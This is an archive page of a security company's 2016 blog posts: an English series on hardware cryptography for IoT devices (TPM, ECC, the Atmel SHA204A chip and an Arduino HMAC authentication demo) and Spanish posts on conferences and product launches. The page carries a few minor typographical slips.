the HMAC command is performed by providing as entry parameters only its mode of operation, and the slot number that contain the key to be used in the HMAC calculation. The response to this command will be the resulting number of 32 bytes from the HMAC-256 computation over a total of 88 bytes made up of: Set of 0x00 value 32 bytes. Content of 32 bytes from the TempKey. Base of 24 bytes determined by the mode of operation. The HMAC command presents multiple modes of operation, which will determine the content of the OPT zone and the series number (SN) for the device incorporated into the base. It is possible that none of these elements are incorporated, establishing the last 20 bytes of the base at 0x00. The base of the HMAC calculation will always begin by the 0x11 byte, followed by the mode byte, and two more bytes indicating the slot which is occupied by the key that will perform the HMAC-SHA-256 calculation. The third least significant bit of the byte mode must coincide with the TempKey.SourceFlag value previously established by the Nonce command. For all communication with the ATSHA204A device, both incoming and outgoing, two CRC cyclical redundancy check bytes will be added to guarantee the integrity of both the command invocation and its response. Web PoC Although the literal description of the authentication commands may appear confusing, their use becomes very simple once implemented within a code library, as can be seen below: As a simple proof of concept (PoC), we have implemented the practical use case of an IoT device that must be robustly authenticated by a web service, using cryptographic hardware. For the example to be extended towards the general public, Arduino is used as development environment on an ESP8266 platform that facilitates web access through its WIFI interface. Any ESP8266 module could be used; a NodeMCU v0.9 has been used in this case, loading a sketch generated from the ESP8266 core for Arduino. An Atmel SHA204A Cryto-Authenticator externally connected to the NodeMCU module has been chosen as the cryptographic hardware. From the different libraries available for managing the SHA204A, the best adapted for this in general, and the most worked on, was the work of Nusku in 2013. However, it apparently did not work uniformly on different devices and presented some important shortcomings. We have solved these problems by publishing our own fork in Github. The authentication in the web service is done by inserting an authentication token in the HTTP request (GET request). This is a very common and widespread practice among the most important web authentication services. The " Authorization” header, together with the adequate parameters, has been added for this purpose. These should include the " 11PATHS-HMAC-256” type token, together with the corresponding encoded values in Base64 format. To simplify the process, in addition to the “id” of the device, the header also includes the " nonce" (challenge) and the " base", used to calculate the verification " signature", although the protocol supports the challenge provided by the server. Captured requests could be re-utilized by sending all this data in the request. In order to avoid this weakness, the timestamp is added in unix-time format as part of the request to be signed. GET /?timestamp=1458647701 HTTP/1.1rn In order to sign the HTTP request with the Atmel SHA204A, it is summarized to 20 bytes with the SHA-1 algorithm. The Arduino core for ESP8266 includes this function in the "Hash.h” library, but it can be added from the Arduino Crytosuite if another platform is used. The SHA204A Nonce command is invoked with the obtained 20 bytes, obtaining the 32 resulting bytes as the challenge, and they are stored. The HMAC command is then invoked, indicating the slot number that contains the key with which the HMAC-SHA-256 will be calculated, together with the execution mode. Once these values (mode and slot) are known, the 24 byte base added to the calculation can be deduced. The result of this command will be the 32 bytes corresponding to the signature of the request. These values, together with the "id" we assign to the device, will be the base64 parameters that will be included in the header. The base64 encoding is done using the Adam Rudd library. Authorization: 11PATHS-HMAC-256 id="EjEjEg==", nonce="LmzzEpRnXvqmvnbOSobGp1VysR/wEpWoMNaY2Miew5g=", base="EQACAAAAAAAAAAAAAAAA7gAAAAABIwAA", signature="4qnOa5ZGecdzC+DscOSuOhJ64LeB1jTieJATUWPoIZE=" The web service will be able to verify the authenticity of the IoT device that makes the request, performing the same calculations and comparing the results. To that end, it only needs to know the 32 byte key assigned to the device by its “id”. The example web service has been published in the following url as part of the demonstration: http://sha204a.cf This web service will respond with a JSON that contains information related to the authentication if it is valid, and failing this, with the details of the error that has occurred. It can be freely used for testing, because it answers to any id that has signed with the example key: " EB0C68BF96E8C26635D3450293D2FC501A63A09924FE90A7BD916AC521FDE0AA" A reciprocal authentication does not occur in this example; in other words, the web service’s answer does not contain any parameter aimed at verifying its own legitimacy, though incorporating it would have been easy. This condition is usually delegated by establishing a secure SSL (https) connection where the web service certificate is verified. The code of the Arduino sketch is very simple. It manages the connection to the Internet with the "WiFiManager.h" library, which presents an AP with a captive portal from which to condiv the Wifi network if the SSID has not been condivd or is not available, or if its credential is not valid. Once the Internet connection is established, the current time is established through an NTP server. An SHA204A authenticated request to the condivd web service is made each time the FLASH button is pressed. A simple Script in BASH can be used to test the connection to the web service; this simple script simulates the calculation of the signature the same way as the ATSHA204A would, and makes the web request. The Shell Script, the Arduino code for the IoT module, and the PHP code of the web service are published in this Github space: https://github.com/latchdevel/crypto-iot *Related Content: Cryptographic Security in IoT (I) Cryptographic Security in IoT (II)
4 de noviembre de 2016
Cryptographic Security in IoT (II)
The proliferation of IoT services platforms and devices is occurring much faster than the adoption of security measures in its field. In the face of the urgent need for mechanisms that guarantee the authentication, integrity and confidentiality, of both communications and the devices themselves, the trend is to transfer cryptographic solutions contrasted in traditional IT, such as public key digital certificates over SSL/TLS protocols. We are moving forward in the state-of-the-art of cryptography solutions for IoT. Crypto-Authentication Given Atmel’s long history of developing security elements with cryptographic abilities, such as TPM modules, microcontrollers for SmartCards, cryptographic accelerators, crypto-memories, comparators, etc. it is only natural that the IoT ecosystem begin to integrate its Crypto-Authenticators to add cryptographic abilities. These have three different available variants: SHA204A: simple authenticator based on MAC/HMAC-SHA-256. AES132A: authenticator and cipher based on the AES/CCM symmetric algorithm with 128-bit keys. ECCx08A: authenticator and cipher based on ECDSA and ECDH elliptic curve asymmetric algorithms, with 256-bit keys. Their physical characteristics are practically identical and are therefore compatible and interchangeable. Choosing one or the other will be determined by the needs of the device storing them, and though they incorporate numerous characteristics of some complexity, it is possible to use their basic functions easily. They can be used as highly versatile cryptographic security elements: from simple device authentication, mutual or reciprocal authentication, session key negotiation for integral encryption of a communication, code or data authenticity verification during secure start-up (SecureBoot) or remote firmware updating (OTA), etc. All this for less than 1 euro. If we meet the program’s requirements for “samples”, Atmel sends free samples at no extra cost. I2C Bus Different small sized formats are produced, all of which are surface-mounted. Though there is a version with only three pins that uses an SWI communication protocol, which for a time was sold by Sparkfun on a mini board, the 8-pin encapsulations are the most common, with SOIC-8 being the most manageable. For the evaluation and testing stages, using a DIP-8 adaptor is advised; there are different types, including the most popular GROVE modules, and you can even make your own. Only four of its pins are in use. Two for its flexible power supply, of extremely low consumption, which can vary from 2.0 to 5.5 watts; two for the I2C bus, which enables connection to microcontrollers such as the popular Arduino, and even desktop systems and servers by means of adaptors, generally USB types. The I2C bus is a standard for serial communication, widely used in the industry to interconnect integrated circuits. It uses two lines to transmit information: a data line (SDA) and a clock line (SCL), both with ground reference (GND). In systems such as BeagleBone and Raspberry PI, the I2C is easily accessible both physically, as it is exposed, and logically, through numerous tools available in GNU/Linux. If we want to use a conventional system, either Windows, Linux or Mac, that does not have an accessible I2C bus, the most simple option is to use an I2C USB adaptor. There are commercial ones, however it is possible to build your own thanks to the i2c-tiny-usb standard driver, which allows any system to use an Atmel ATtiny 45/85 microcontroller by way of interface USB to I2C. Only a few brave people dare to use the I2C bus present in the connector of video cards, even though it is technically possible. Although it doesn’t provide the same functionality, it is also possible to use firmware that uses the LUFA library in any compatible Atmel microcontroller, for example the ATmega32u4 from Arduino Leonardo, creating a "Serial to I2C" interface, which is accessible from Python, for example. With the USB adaptors included in the official Atmel development kits, the Microsoft Word tools that are included for free can be used. Communication in the I2C bus is conducted in a “master-slave” manner. The master initiates the dialogue, obtaining a response from the slaves that are identified by their 7-bit I2C address. This address comes factory ready, though many devices have mechanisms to modify it, allowing several similar devices to connect to the same I2C bus. The “host” systems can only be masters of the I2C bus, with the majority of I2C devices being slaves. Some microcontrollers, for example those used in Arduino, can be programmed to behave as masters or as slaves, though it is most common for them to act as masters. Through the "i2cdetect" command in Linux, or with a simple sketch in Arduino, the I2C bus can be scanned to detect connected slave devices. In this scanning example, performed in either Linux, with an "i2c-tiny-usb” adaptor, or in Arduino, the real I2C addresses (in 7-bit format) for the crypto-devices connected to the bus can be obtained. Many manufacturers, Atmel included, usually indicate the I2C addresses in 8-bit format in their specifications, which can result in some confusion. Open Source libraries Together with detailed documentation, Atmel facilitates open source libraries for cryptographic device management from their line of micro-controllers and SoCs. From these libraries, adaptations to different environments began to appear, once again emphasising Josh Datko’s work which, from Cryptotronix, facilitates numerous examples for both Linux and Arduino. The Atmel SHA204A Linux driver, called Hashlet, particularly stands out, and has served as a starting point for many other developments. There are different adaptations for the Arduino platform, each of which has its pros and cons, so a choice must be made to find the one that adapts best to each particular need. Atmel SHA204A The Atmel SHA204A is one of the simplest and most easy to use cryptographic devices, though it has a wide variety of functions in relation to its relative complexity. Its functioning is based on the computing of SHA-256 summaries, used to generate MAC/HMAC (Message Authentication Code) from internally stored keys. It has 16 slots to store keys that are 256 bits (32 bytes) in length, and can, in turn, have different access and usage configurations, defined when personalising the device. Together with an 88 byte configuration zone and an OTP (One Time Programmable) zone that is 64 bytes in length. It has a random number generator, with which it implements challenge-response operations without exposing keys (MAC, CheckMac, GenDig). Supporting "Key Rolling” mechanisms (DeriveKey). It is unequivocally identified by an unmodifiable, factory-defined 72 bit serial number (SN). It has an abundance of official documentation which is available on the internet, as well as a large number of examples developed by the Open Source community. Though it implements 14 commands, it is possible to make complete functional use of it with only two of them, as we will see next. Personalisation Before being able to use any cryptographic device, it is necessary to establish its unique keys and configuration options, and to lock the configuration and OTP zones. This process is known as " personalisation", and is irreversible; once this has been performed, there is no possibility of turning back, the established parameters will remain unchangeable. ATSHA204A personalisation is easily performed through Linux by using the Cryptotronix “hashlet”, as described in the documentation. Once the personalisation command has been executed, the unique keys will be defined and condivd in the following manner: If you have an official Atmel development kit, it is possible to perform the personalisation process from the incorporated tools, but, in any event, it is essential to follow the manufacturer’s indications. Stay tuned! In the following post about Cryptographic security in IoT, we will take a look at how the HMAC calculation works in technical terms in ATSHA204A. And as a proof of concept (PoC), we will implement the practical use case of an IoT device that must be robustly authenticated by a web service and using cryptographic hardware. *Related Content: Cryptographic Security in IoT (I) Cryptographic Security in IoT (III)
28 de octubre de 2016
Todo lo que presentamos en Security Innovation Day 2016 (II): Soluciones de Seguridad para controlar en todo momento tu negocio
Un punto de entrada único a todos tus servicios de seguridad. Desde nuestros primeros servicios siempre hemos tenido como objetivo que su utilización resulte una experiencia sencilla a la vez que eficiente, y que en definitiva les proporcione una perspectiva diáfana e inmediata del estado general de su seguridad. En nuestro afán de continua mejora y con el objetivo de proporcionar una visibilidad y control total, en Security Innovation Day 2016, hemos presentado la primera versión de lo que hemos denominado SandaS Unified Security Platform. Esta plataforma pretende convertirse en el punto de entrada único de todos los servicios que el cliente tiene contratados con Telefónica. Permitiéndote una visión holística y contextualizada, ya que aglutina una serie de indicadores relevantes procedentes de nuestros servicios de seguridad y los combina con información de contexto que nos proporciona la tecnología Autofocus de Palo Alto Networks. SandaS Unified Security Platform te ofrece: Visión holística del estado de la seguridad de la organización, incluyendo incidentes de seguridad, situación comparativa respecto al contexto global e información acerca del impacto en el negocio. Situación operativa de los servicios de seguridad contratados. Acceso a los portales específicos de cada servicio. Módulo de Data Management que almacena la información relevante de todos los servicios de seguridad Sistema innovador de Machine Learning para el análisis combinado de todas las fuentes de información y detección avanzada de amenazas. También presentamos dos servicios, CASB y Clean Pipes 2.0, los cuales se incluyen dentro del ecosistema de SandaS: Los agentes de seguridad de acceso a la nube, CASB, que proporcionan visibilidad del riesgo que suponen las aplicaciones de nube. Detectando y analizando el uso de las aplicaciones de nube, autorizadas o no, desde dentro de las instalaciones de cliente. El servicio de Clean Pipes 2.0, tiene como propósito principal segurizar todas las comunicaciones corporativas independientemente desde donde se realicen –desde el cuartel general hasta el lugar más recóndito del mundo. David Prieto Marqués Head of MSS & Network security. Conoce el estado de Seguridad de tu organización en todo momento. En un mundo cada vez más global, más intereconectado, más digital, la seguridad de nuestra organización ya no depende solo de lo que hacemos nosotros, sino también de lo que no hacen nuestros proveedores. Brechas como la de Target, Home Depot y el impacto de la brecha de Yahoo en casos de fraude de identidad etc. demuestran que los atacantes utilizan cada vez más vías indirectas para alcancar sus objetivos, buscando muchas veces el eslabón más débil de una cadena de suministro. En Security Innovation Day 2016 anunciamos nuestra colaboración con BitSight, un partner tecnológico que propone algo diferente. Todos conocemos los ratings utilizados en el sector financiero para valorar de forma clara la calidad de inversiones, bancos, economías de países etc. ¿Podemos hacer lo mismo para reducir en una única nota el estado global de la ciberseguridad de una organización? La respuesta es sí. El rating de Ciberseguridad que presentamos en el Security Innovation Day 2016 tiene la siguientes características: Representa la visión que tienen nuestros colaboradores de nosotros. Se utilizan fuentes e información accesible fuera de nuestra organización. Es un enfoque de caja negra. Es un rating objetivo que permite comparaciones entre organizaciones. Se miden variables de riesgo que aplican a cualquier empresa, independientemente de su negocio, sector, tamaño etc. Es una solución escalable a cualquier empresa. Se han elegido variables de riesgo representativas de la seguridad de una organización, y se pueden medir de forma totalmente automatizada. Permite conocer el estado de seguridad de cualquier organización de forma continua. Al ser automatizada se puede aplicar de forma continua en gran escala. El servicio se ofrece como una herramienta SaaS que permite monitorizar la evolución de los ratings, recibir avisos de cambios bruscos y conocer también el por qué, para poder tomar acciones. Con los ratings de Ciberseguridad podemos en primer lugar conocer cómo nos ven nuestros clientes y competidores y comparar nuestra organización con nuestro entorno, tanto en momentos puntuales como su evolución histórica. El primer pilar por tanto de la propuesta de valor es lo que llamamos benchmarking. El segundo pilar es la monitorización del rating de todos nuestros proveedores. Se puede hacer tanto individualmente como de forma agregada estimando el rating global de toda nuestra cadena de suministro. Este servicio esta ya disponible a través de la fuerza de venta de Telefónica, pero nuestra alianza no acaba aquí. Por ello, estamos ahora trabajando para dar el primer paso integrando nuestros productos Tacyt y Path6 con Bitsight para añadir una variable de riesgo asociado al canal móvil de una empresa y de su cadena de suministro. Nikolaos Tsouroulas Global Product Manager for Cybersecurity Services No te pierdas el resto de la serie "Todo lo que vimos en Security Innovation Day 2016": » Todo lo que presentamos en Security Innovation Day 2016 (I): Partners Program y Alianzas » Todo lo que presentamos en Security Innovation Day 2016 (III): ¿Son seguras las apps [des]conocidas de mi empresa? » Todo lo que presentamos en Security Innovation Day 2016 (IV): Descubrimiento y control online de la información oculta » Todo lo que presentamos en Security Innovation Day 2016 (V): Aumenta la seguridad de tu firma digital
27 de octubre de 2016
Así fue nuestra participación en CELAES 2016
CELAES 2016 es la Principal Conferencia de Seguridad Financiera en Latinoamérica, este año fue hospedada y organizada por FIBA (una asociación gremial sin fines de lucro y un centro internacional de excelencia financiera) en Miami, USA. Durante dos intensas jornadas, donde se dieron cita los principales Bancos de Latinoamérica y Centroamérica, se celebraron diversas actividades enfocadas en la Ciberseguridad y el Fraude en entornos transaccionales. En este contexto estratégico con más 500 asistentes, fuimos patrocinadores Platinium junto con Logtrust. Durante estas jornadas presentamos en exclusiva al sector financiero nuestra nueva Solución Antifraude: Fraud Management & Intelligence (FMI). Una solución cuyo objetivo es minimizar las pérdidas y riesgos derivados del fraude y, consecuentemente, maximizar los beneficios y la resiliencia del negocio. Además, gracias al enfoque estratégico de FMI, es posible realizar un diagnóstico de la situación actual del Fraude en línea con los objetivos del Negocio (Situation Analysis, Gap Analysis), y definir un plan estratégico de gestión integral del fraude (Fraud Action Plan) para poder llegar a alcanzar el nivel de madurez adecuado para la organización. Para ello, FMI ha definido un marco metodológico que se centra en 7 dominios funcionales (Plan, Assess, Prevent, Detect, Respond, Investigate, Discover). Los asistentes que nos visitaron estos días pudieron comprobar “ in situ” la solución mediante demos interactivas, ejemplo de las capacidades y valor añadido que la solución ofrece, ayudándoles a ver el fraude desde un punto de vista holístico. Además fueron entregados informes preliminares y personalizados a entidades bancarias interesadas, que contemplaban diferentes amenazas (Threat Insights), apoyadas por una muestra de resultados e inteligencia de fraude determinantes para la toma de decisiones directas por parte de la entidad. En conjunto, las entidades bancarias presentes pudieron ver de primera mano, y con datos reales, información personalizada sobre el fraude a su entidad y ver en las demo en tiempo real la velocidad de procesamiento de la plataforma, su alto nivel de granularidad por región o tipo y ejemplos de integración con el transaccional (FMI Swarm) un consolidado del fraude en números (Nº operaciones y Monto total vs Fraude y % fraude en respecto al monto total, etc.). Además tuvimos presencia en la agenda del evento con la ponencia de Claudio Caracciolo, CSA (Chief Security Ambassador) de ElevenPaths, que nos dio un entretenida y afilada charla acerca de: “ Advanced Banking Security in the Digital Age”, aportando una visión completa sobre los nuevos desafíos (certificados, apps mobiles, etc.) a los que se enfrentan las entidades bancarias. Para nuestro equipo fue todo un éxito participar de nuevo en un entorno privilegiado, que nos permitió contactar con numerosos clientes potenciales, promocionando la nueva solución FMI para el sector financiero; así como, mostrando otras soluciones disruptivas como Faast dentro de VAMPS y nuestro servicio de CyberThreats.
24 de octubre de 2016
ElevenPaths participará en la Conference on Cryptology and Network Security (CANS) con una investigación sobre HPKP y HSTS
Una investigación sobre HSTS y HPKP realizada desde el área de innovación y laboratorio de ElevenPaths, ha sido aceptada para participar en la International Conference on Cryptology and Network Security (CANS) 2016 que tendrá lugar en noviembre en Milán y donde se presentarán los resultados. La International Conference on Cryptology and Network Security (CANS) es una conferencia anual que se centra en todos los aspectos de la criptología, datos, redes y seguridad informática e intenta reunir los resultados más recientes en ese campo que provengan científicos de todo el mundo. Esta edición número 15 tendrá lugar en Milán, del 14 al 16 de noviembre. Otras ediciones de CANS se han celebrado en Taipei (2001), San Francisco (2002), Miami (2003), Xiamen (2005), Suzhou (2006), Singapur (2007), Hong Kong (2008), Kanazawa (2009), Kuala Lumpur (2010), Sanya (2011), Darmstadt (2012), Parary (2013), Creta (2014), y Marrakesh (2015). CANS 2016 coopera con la International Association of Cryptologic Research (IACR). La investigación presentada indaga sobre la implementación de HPKP y HSTS tanto en el entorno servidor como cliente, y demuestra con pruebas de concepto algunos potenciales problemas que pueden derivarse del análisis realizado. Fruto de esta investigación se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths.
24 de octubre de 2016
Cryptographic Security in IoT (I)
The proliferation of IoT services platforms and devices is occurring much faster than the adoption of security measures in its field. In the face of the urgent need for mechanisms that guarantee the authentication, integrity and confidentiality, of both communications and the devices themselves, the trend is to transfer cryptographic solutions contrasted in traditional IT, such as public key digital certificates over SSL/TLS protocols. But the main problem with this approach is to be found in the storage of these certificates on the device. In traditional IT, the operating system is generally responsible for this task. Both Microsoft Windows and Mac OS X, or Linux/UNIX, and their mobile variants (Windows Phone, iOS and Android) have a software tool for this purpose (KeyStore), that generally comes pre-loaded with multiple trust certificates, at least, for the operating system manufacturer. Microsoft Windows Certificate Manager Cryptography in IT But these software storage systems present several weaknesses due to their very nature, and so, in IT settings where security is a priority, the current trend is to use a cryptographic hardware element called a TPM (Trusted Platform Module). The technical specifications of the TPM module are set forth in an open standard defined by the Trusted Computing Group (TCG). The TCG is a non-profit organisation made up of the main market manufacturers of software and hardware, whose goal is to define, develop and promote open specifications and standards for “secure and reliable computing”. The TCG started its work in 2003, following in the footsteps of the Trusted Computing Platform Alliance, created in 1999. Since its beginnings, the organisation has been mired in controversy. The free software community, with Richard Stallman at the forefront, has been particularly critical, as the original motivation for it was to protect intellectual property via digital rights management, or DRM. The TPM module is based on a crypto-processor (discrete chip) that provides advanced security capabilities. It enables the generation and storage of cryptographic keys and operations to be performed on them, in such a way that the keys never abandon the chip, which is specifically protected against physical attacks (tampering). Produced by different manufacturers (Infineon, Atmel, STMicro, Broadcom, etc.), alongside protection against physical attacks, they include security mechanisms to withstand logical attacks. The NIST accredits them with level 4 certification FIPS 140-2. The use of TPM modules presents restrictions in several countries such as China, Russia, Belarus and Kazakhstan. Many desktops, business range laptops and servers incorporate a default TPM module (estimated at over 300 million), though it is also possible to incorporate one separately through the connector that the LPC bus presents in a wide variety of post 2004 domestic machines. TPM modules can securely store a large variety of objects: digital certificates, asymmetric keys, symmetric keys, credentials, cookies, signatures, audit logs, etc. These are integrated at the BIOS/UEFI level of the machine, and enable certain security criteria to be added in the system pre-start, such as integrity check for configuration changes. These mechanisms are known as “Platform Configuration Registers” or PCRs. One interesting and highly useful function is that it offers the option to authenticate the device rather than the user. Thus, it is possible to establish network access policies in AP wireless, firewalls, routers, switches, etc. compatible with standard 802.1x. TPM settings in an American Megatrends BIOS TPM integration with the Operating System provides a complete API of cryptographic services that can be widely exploited with Microsoft Windows from the Vista version and Server 2008. Worth particular mention is its ease of use with BitLocker to encrypt disc units, with Outlook for encrypting and/or signing emails, in the storage of digital certificates and VPN credentials, and with different group policies for the Active Directory on Windows Server. For its part, Apple briefly included TPM modules in their first Intel processor MacBook in 2006, but official support is practically non-existent these days. On the GNU/Linux side of things, different drivers and tools have been developed for the use of TPM modules. Its support is included in the Linux kernel starting with version 2.6, along with the possibility of housing SSH keys and establishing security policies for system start-up through Trusted GRUB and U-boot. Google distributes its Chromebooks with a default pre-activated TPM, as indicated, due to security questions that have been analysed by MIT researchers. TPM specifications are set down, as of 2009, in the ISO/IEC standard 11889. The most recent version (TPM v2.0) is from 2014 and incorporates numerous advances, such as the possibility to use multiple Root Keys, SHA-256 overviews and elliptic curve cryptography “ECC” algorithms. But the most significant advance is the possibility to implement the TPM module in firmware mode (fTPM), executed within a Trusted Execution Environment (TEE). It is provided at a hardware level in the most recent Intel, AMD and Qualcomm processors, and is omnipresent in ARM architecture where it is called TrustZone. Microsoft Windows TPM management component Thus, the hardware security characteristics provided by TEE make up the foundation of the cryptographic security that most modern smart phones are implementing, both in the biometric authentication process and it their use as a payment method. However Apple has its own development of similar characteristics known as " Secure Enclave", integrated into its new A7 processors. Cryptography before IoT When we browse the Internet of Things, we find tiny embedded systems that, with any luck, manage to execute reduced versions of Linux as an operating system because, in many cases, they only have an SoC (System On a Chip) type microcontroller. Though every new SoC generation is stronger than the previous one, they are still far from having the characteristics needed to transfer over cryptographic solutions from traditional IT, such as keystore software or conventional TPM hardware. Small IoT devices require cryptographic solutions that are adapted to their own dimensions, as well as capacity, complexity, usage, cost, etc. Though this may seem it, it really isn’t that new. This need has been a reality for quite some time, as have the solutions. A worthy example would be how naturally we have accepted, for the past 25 years, cryptographic security in our mobile phones. We assume, simply because we have a SIM in our possession, that the operator can unequivocally authenticate us with no risk for error, interference or identity theft, and that our voice and data communication travels through the air meticulously encrypted without any possibility for third party interception. This, a reality in our day-to-day lives, has been achieved by establishing a shared secret between the operator and ourselves, as simple as a 128-bit symmetric key known as "Ki", jealously guarded in the operator’s infrastructure and sturdily stored within our SIM, from where it will never leave. In this case, the SIM acts as a cryptographic device, storing the symmetric key, performing the necessary cryptographic operations without ever abandoning the SIM, and implementing additional protective measures against both physical and logical attacks. And so the various challenges of symmetric and asymmetric key management emerge, in devices that, in general, will be remote, autonomous or unattended. Special importance is given to the “personalisation” phase in device production or post-production, along with deployment techniques or mechanisms or enrolment in their respective service platforms. Hardware cryptography for IoT It is possible to find different cryptographic devices similar to the SIM, with both symmetric and asymmetric keys and in different discrete formats. The ATMEL cryptographic hardware family particularly stands out, due to both its ease of use and documentation as well as the accessibility to development kits and open source libraries. These took on special relevance when Sparkfun joined several of them in a card as an accessory to the BeagleBone board, highly used by Josh Datko in his 2014 book BeagleBone for Secret Agents. That year, he gave a demonstration at the prestigious DEF CON 22 conference. Similar gadgets began to appear shortly afterwards, particularly boards such as the Raspberry PI, due to its accessibility to the I2C bus and SPI through which these devices usually communicate. Lastly, it was Sparkfun who once again joined all these elements in a Crypto Shield for Arduino, which can be used in a conventional UNO. In addition to a real-time clock (RTC), it incorporates four cryptographic elements: A TPM Atmel AT97SC3204T, for encryption and RSA asymmetric signing. An Atmel ATAES132 authenticator, for authentication and AES symmetric encryption. An Atmel ATSHA204 authenticator, for MAC/HMAC SHA-256 authentication. An Atmel ATECC108 authenticator, for authentication and encryption via ECDSA Elliptic Curve algorithms. The presence of a cryptographic hardware device based on hyperbolic curve algorithms, specifically on ECDSA Elliptic Curve ones, seems to indicate the road to go down. Elliptic Curve Cryptography Hyperbolic curves have been known about and studied for over a century. Though their application in cryptography initially had its detractors, today it is one of the most promising fields within modern asymmetric encryption techniques. Though its theoretical complexity is relatively high, it presents certain advantages versus traditional algorithms based on factorisation, such as RSA. Its implementation is very efficient due to the same arithmetic of the elliptic curves and, above all, it manages to reach optimum security levels with significantly reduced key sizes. This property makes elliptic curve cryptography (“ECC”) the ideal candidate for implementation in devices with small capacity for calculation, such as those found in the IoT ecosystem. These days, elliptic curve algorithms are, by and large, set out in the main international regulations and certifications. In fact, the most popular cryptographic software, OpenSSL, supports ECDH and ECDSA elliptic curve algorithms for key exchange, encryption and digital signatures, from its v0.9.8 version and through a wide variety of curves. They can be consulted with command: openssl ecparam -list_curves As ECC algorithms are already fully compatible with the majority of servers and browser of the World Wide Web, reputed certification entities such as DigiCert, Entrust, GlobalSign and particularly Symantec, have root certificates signed with ECC algorithms, as well as full capacity for their issuance and distribution. Yet the first large-scale use of elliptic curve cryptography can be found in the crypto-currency Bitcoin, which has been using ECDSA for transactions signatures since its appearance in 2009. IoT Devices The need to provide cryptographic capacities in the IoT world is leading manufacturers to include specific hardware in their general use devices destined for the makers’ ecosystem. One of the first to do so was the Italian firm Axel Electtronica which, with its Smarteverything, managed to unite a large number of sensors and a SIGFOX (868 Mhz) wireless network module, in addition to a Crypto-Authenticator Atmel SHA204a. In the same vein, the official Arduino matrix has announced a new model that is specially conceived for IoT and known as MKR1000, which, among other characteristics such as a WIFI 802.11 b/g/n network module, will have an Elliptic Curve Crypto-Authenticator Atmel ECC508a. Added to the natural tendency to facilitate wireless connection mechanisms is the trend for including cryptographic authentication elements. It will be some time yet before this practice is generally applied and until it becomes an essential requirement. While this takes place, it will be common to connect them discretely as independent modules. This is possible via accessible communication standards that generally use an I2C or SPI bus, and the abundant documentation that the manufacturers publish. Practically any system or platform that has an I2C bus can easily incorporate cryptographic hardware; for example, all those based on the Arduino system shown in the following table: In the following section we will elaborate on other interesting aspects regarding cryptography and IoT hardware and describing the libraries and hardware available practicing with cryptography in IoT. *Related Content: Cryptographic Security in IoT (II) Cryptographic Security in IoT (III)
21 de octubre de 2016
Asiste hoy al evento de OWASP Madrid
Hoy, miércoles, nuestra compañera Eva Suárez estará en OWASP Madrid presentando la charla ‘ Show me the Dork’. Junto a Manuel García Cárdenas, mostrarán una plataforma que han desarrollado, la cual recolecta información a través de todo tipo de dorks. En relación con el evento, hay que indicar que la guía 4.0 de OWASP, muestra una de las primeras pruebas que se realizan en la categoría de recolección de información, la cual es verificar que los aplicativos no posean este tipo de fugas, teniendo como referencia Motores de búsqueda, como puede ser Google. La plataforma desarrollada, simplifica este tipo de trabajo, ya que recolecta de fuentes externas todo tipo de dorks, los categoriza, e identifica dominios que estén afectados por estos sirviéndose de motores de búsqueda como Google. De esta forma, desde la herramienta ShowMeTheDork es posible realizar búsquedas por dominio y comprobar si están afectados por dorks. Pásate por el evento y disfruta de la siguiente agenda: • Alejandro Guirao Rodríguez – Haciendo el (Chaos) Monkey • Roberto Muñoz Fernández – Seguridad en Docker: los básicos • Eva Suárez y Manuel García Cárdenas – Show me the Dork No lo dudes y pásate a ver estas tres grandes ponencias y disfruta del evento de OWASP en Madrid.
19 de octubre de 2016
20 de octubre: Comienza el viaje hacia Data-Driven
La importancia del Big Data en la toma de decisiones en el lanzamiento de la nueva unidad de Big Data B2B. En la era digital en la que vivimos, estamos invadidos de datos. Cada día recibimos y generamos millones de datos que se pierden en el universo digital. El reto actual consiste en sacar el máximo partido a ese volumen de información en cada aspecto de nuestra vida, tanto personal como profesional. En el terreno empresarial, las organizaciones deben de considerar esos datos como una prioridad para la toma de decisiones estratégicas. Sin embargo, muchas empresas no se han actualizado o no tienen los medios necesarios, y siguen sin aprovechar las oportunidades que todos esos datos pueden generar. Desde Telefónica, nuestros compañeros de la unidad de CDO (Chief Data Office) quieren cambiar esto. Para ello, el próximo jueves día 20 de octubre es el gran día en el que lanzarán una nueva unidad de Big Data B2B. El gran lanzamiento tendrá lugar en el Auditorio de Distrito Telefónica a las 15:30, y en él se presentarán las soluciones y servicios que Telefónica ofrece a sus clientes en materia de Big Data, contando con experiencia en áreas como Ingeniería de Datos, Herramientas e Infraestructura, Business Insights y Ciencia de Datos. El evento contará con ponencias de la mano de Chema Alonso (CDO), Elena Gil (Directora Global de Big Data B2B), José Luis Gilpérez (Director de Defensa, Seguridad y Big Data para España) y Carme Artigas (CEO de Synergic Partners), que desvelarán las claves para convertir una empresa en data-driven y su nueva marca. También se presentarán algunos casos de éxito de Europa y Latinoamérica para mostrar cómo pueden ofrecer un servicio extremo a extremo a las organizaciones que aspiran a transformar sus datos en un activo clave. Podéis encontrar la agenda del evento aquí y además podréis seguir las ponencias en directo por streaming. Nos vemos el jueves.
18 de octubre de 2016
ElevenPaths en la XIV Reunión Española sobre Criptografía y Seguridad de la información (RECSI)
Los aficionados a la criptografía y seguridad informática en general tienen una cita en la XIV Reunión Española sobre Criptografía y Seguridad de la información (RECSI) que se celebrará en Mahón, en las Islas Baleáres del 26 al 28 de octubre. La conferencia RECSI, de celebración bienal, es una de las conferencias más antiguas y de prestigio en España. Una conferencia que reúne a expertos de mundos dispares: en esta edición se profundizará en multitud de temas que irán desde la seguridad en dispositivos móviles hasta el criptoanálisis, pasando por protocolos criptográficos, seguridad en redes, nuevas amenazas y mecanismos de defensa, privacidad, etc. En esta edición, ElevenPaths presenta un trabajo fruto del departamento de investigación y laboratorio: HSTS y HPKP: Un estudio cuantitativo y cualitativo de su implementación en servidores (Carmen Torrano, Sergio de Los Santos y Antonio Guzmán). En esta ponencia se hablará sobre la implementación de HPKP y HSTS en los servidores actuales, no solo desde un punto de vista cuántitivo (quién lo implementa) sino además cualitativo, (cómo se implementa), lo que permite ahondar en errores y problemas de configuración conocidos. Fruto de esta investigación se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths.
17 de octubre de 2016
New tool: PESTO, PE (files) Statistical Tool
